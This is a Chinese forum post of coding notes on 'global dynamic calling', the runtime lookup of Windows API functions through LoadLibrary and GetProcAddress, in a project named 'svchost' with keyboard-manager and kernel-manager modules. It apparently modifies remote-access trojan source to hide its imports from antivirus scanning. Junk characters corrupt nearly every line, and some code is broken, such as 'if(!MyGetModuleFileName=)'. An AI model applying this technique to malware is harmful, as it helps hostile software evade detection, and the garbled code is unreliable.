[原创文章] 全局动态调用 全局, 动态

ice_xke

全局动态调用笔记0 J( I, X0 T- M3 B" V0 d( C7 r
svchost files工程->插入->类(Generic Class DTDY)->DTDY.cpp DTDY.h
3 d1 x. [3 u/ e$ m( N% q----------------------------------------# Q. F( U- Q5 V, t5 s7 u
DTDY.h：
" x$ _  H: k6 H( }# \/ r' p) U& ]. Z/ t5 n1 G
#if _MSC_VER>1000
$ ]7 }! X' @1 r8 ~( n#pragma once* N( A4 B  j9 U% M
#endif //_MSC_VER>1000, [, C" R( B* C# H) E
#include<windows.h>1 G1 H/ y  i/ u! ^
1 a- s  }, a& K: P
typedef DWORD (__stdcall *pGetModuleFileNameA)(HMODULE,LPSTR,DWORD);
/ b" c: u, j2 j  V4 w7 Dclass DTDY
. |( p  a0 s0 B: r, W{3 N1 w2 s0 ]2 {3 x
public:6 J3 s# W6 N, y1 c7 ?, C
DTDY();
( N) _. A( v- V0 T% Vvirtual ~DTDY();: W2 G. P+ x, y, w3 v, ]' Z1 m$ L( S
public:" c6 ^8 R+ P+ O. Y' b
static pGetModuleFileNameA MyGetModuleFileName;
0 x4 [- a$ {1 v7 p% Tstatic BOOL FunInitiallization();
2 l; O  q# p: h- g$ [};2 ^2 ]2 a! \6 M- s' B& n; A
#endif( E5 r0 G( k$ b: t7 I! f7 [9 G
----------------------------------------) M7 d# b# j0 ~; P( {% z, X
$ C; F8 X. ^  t$ Z3 W
DTDY.cpp:
( u' c) ^- J# I! `3 Z: ~' S$ f$ l4 y) I! C1 |- G9 X* U( U) V
#include "DTDY.h"
+ h% b0 C7 z. e2 upGetModuleFileNameA DTDY::MyGetModuleFileName=NULL;
8 {- g! H0 [' z: dDTDY:TDY()$ k" @% d/ E2 l: {7 A1 C0 ]* i
{
$ d% Y5 k' E( N% T- l6 \6 Q3 \}
& F5 L. h% w- F# N7 ]" |, dDTDY::~DTDY()$ \' c* c% i( H8 L2 e: T
{
- M3 G% x! E* Y  N5 [. h}# B/ H# p& u. n$ g1 X
BOOL DTDY::FunInitiallization()7 w: F4 g8 ^) D' v1 u4 U+ v8 ^
{
' p/ s& A$ {$ P/ RHMODULE hModule=LoadLibrary("kernel32.dll");
% t* U1 `; |2 n, _, q& \% y. V, kMyGetModuleFileName=(pGetModuleFileNameA)GetProcAddress(hModule,"GetModuleFileNameA");
! Y$ X- n. f: aif(!MyGetModuleFileName=) return FALSE;6 W; n% ?* S% N: o. ]

* w& R% f' ]0 j8 O- _return TRUE;
5 Z+ A1 i- v* n& u  J! [  Q6 U+ t}
+ ]; q- ]& K) Z9 y9 M----------------------------------------
5 X3 |% B. [3 L3 V" b( ssvchost.cpp:
# j9 D% m* I, s$ H/ L; o% W9 w& |- C) o6 i+ ^  g: x9 ~% i
#include "DTDY.h"
6 ^8 W2 V; [  y- W
3 _0 f0 G) ~4 [9 Q* ?7 I; hBOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
/ ^& i; K1 U. u) ^2 ^{
* j/ |' q" f4 r+ o7 d6 g! Zswitch(ul_reason_for_call)
$ |- h7 {6 q8 ~6 _{' r- [+ t  t/ ~
case DLL_PROCESS_ATTACH:
9 H: p) x, ~: j$ Q+ I5 f7 aif(!DTDY::FunInitiallization()) return FALSE;
# l$ y1 ]  Y6 i+ r. I: p! Z; X% R, C
1 d5 G4 d- {: }5 `  c8 kbreak;+ S$ f. I& m  Z
}7 o6 t0 T" G! ?7 Y
}. T' C" ^. C! L- i" U/ e

: m" Q) @8 `, o, M! ~6 T- w; q( ^2 |, g1 M& e
GetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));->goto def( c' J( k' a0 g4 u. n9 u: q; K
改写为
% @# |8 ?1 B/ u* J. V! {DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));2 |& g% v  m) |4 A# \
----------------------------------------9 g" ~! V' c0 t7 e1 R
KernelManager.cpp:) i$ K# o" o0 ?& F7 g" }1 |6 v

. G" f- b* T- N( o" Y; s#include "../DTDY.h"
' p0 ~- E. Z: ]2 p/ o& G2 xGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));3 X/ G" J) \+ _; T7 ~! Q1 o
改写为
% R5 q1 `3 F8 g0 oDTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));( Y/ d( [5 e/ ?  T
----------------------------------------